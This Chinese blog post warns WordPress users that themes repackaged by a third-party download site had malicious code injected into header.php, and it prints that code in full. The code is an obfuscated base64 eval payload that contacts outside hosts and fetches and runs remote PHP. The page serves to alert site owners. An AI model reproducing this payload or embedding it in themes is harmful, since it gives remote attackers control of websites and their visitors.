Article Information

Readers: 483 | Updated: 01-25

不要随便从第三方网站下载wordpress主题模板

Translate Into:

著名的网站设计师Derek在自己的Blog上提醒Wordpress的新手在从一些主题下载站下载WP模板时一定要小心,因为他发现自己制作的模板被一个名为WP Sphere(这个网站现已不能访问)的站点重新打过包,并在header.php文件中嵌入了恶意代码,因此从该站点下载了模板的用户很可能会中招,Derek建议大家直接从模板作者的网站上下载东西而不是经由WP Sphere这样的第三方主题站,国内也有不少第三方站点提供WP模板的下载,目前似乎还未发现这样的恶意事件,不过小心使得万年船,在应用模板前最好检查一下文件代码,看看是否有类似的恶意代码,如果你的Wordpress水平已经到了一定水平,不妨试试自己写模板吧。

嵌入到Derek模板中的恶意代码:

@eval(@base64_decode(’aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\
SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I\
iOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD\
kxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMk\
QwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1Qj\
M5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRj\
EyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIj\
sgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OT\
cgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3OD\
M2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJF\
JEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgIC\
RSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cD\
ovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLm\
NvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waH\
A/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXS\
kgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0\
hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRT\
kwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNj\
U2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOU\
I3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQT\
gwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMz\
M1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRk\
U5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdX\
JsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG\
9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIE\
ByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMT\
E1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQk\
MzMDkxNik7′));

Tags: , ,


From The Blogs

Internet Observation

2007
25 种能马上改善网站、提高浏览量的方法
注:以下是简单的意思大概~介意的话请看原文~要做好一个网站是非常辛苦的,通常有没有捷径,但以下这个清单应该能为您提供几点建议。这是我为了在最短时间内改善网站、提高浏览量而编制出的一份清单,只需要几分钟... 查看全文

2007
Jimdo:简便的网站建设平台
Jimdo是一个来自德国汉堡在线的网页制作工具,用户可在不懂任何网页制作方面的知识的情况下轻松制作出漂亮的个性主页。Jimdo 对于绝大多数互联网用户们来说,或许是线上最简便的网站建设平台。 Jimd... 查看全文

Internet Observation

06-27
网站的变化:10个流行网站的变与不变
第一次知道不断发展的网络世界是在90年代中期,我那时在念高中,也没想到我的未来生涯会赖上这个产业——小学时还不存在。现在,2008年,我生命的一半都用来做网站。回顾过去的十五年,网站发生了很大改变,同... 查看全文

Internet Observation

06-04
43个不可错过的优秀音乐网站
最近几个月,互联网上涌现出成百上千的音乐网站。众多网站里,只有其中一些是值得我们浏览的,Busineshacker为此列出了最热门的网站和实用率。·   AjaxAMP:安装winamp 多媒体播放软... 查看全文

Internet Observation

2007
网站的用户界面,等同于网站的品牌
Jerff Atwood写了一篇博客,内容是关于“Google在用户界面设计上所犯的第一大错误”。Google保守的用户界面是值得人称赞的。但是他们主页用户界面上的一部分,那个每天被登录数百万次的地方... 查看全文

Personal Growth, Career Planning

10-07
5个网站对比,助你节省金钱
也许你已经十分熟悉比较购物的方法了。现在这些都是非常有用的网站,它们可以帮助你在在线零售商中比较各个产品。在过去的3-4个月里,我发现了一些很酷的网站成功地把理念实施到别的地方。现在就一起来看看。 查看全文

Internet Observation

10-18
网站地图介绍(以及一些创建网站地图的资源)
网站地图对Web设计人员和访问者都非常有用。总共有两种不同的网站地图:1)XML网站地图(也称为Google网站地图)和2)HTML网站地图。各有不同的用处。 查看全文

Internet Observation

06-18
如何创建一份有效的网络设计调查问卷
因特网为网络专业人士提供了很多平台来寻求基于某些项目的工作。有许多提供自由项目的网站,如allfreelance.com,分类上市的网站,如craigslist,以及在知名博客上的工作登记,如free... 查看全文

Parenting Advice

10-07
三个能使您家孩子变聪明的教育性网站
既然学校在大部分国家都由国家资助,用三个另人毛骨悚然的教育性网站来帮助修补你家孩子的大脑肌肉。 查看全文

Internet Observation

07-17
自由网站设计者的未来5年
从2001年网络泡沫爆发,到2006年无处不在的WEB2.0 正式成为主流大约用了5年的时间。在这5年里,人们通过对XML和RSS等标准格式、面向服务的网络应用程序、用户控制的数据的应用,认识到了英特... 查看全文
More Articles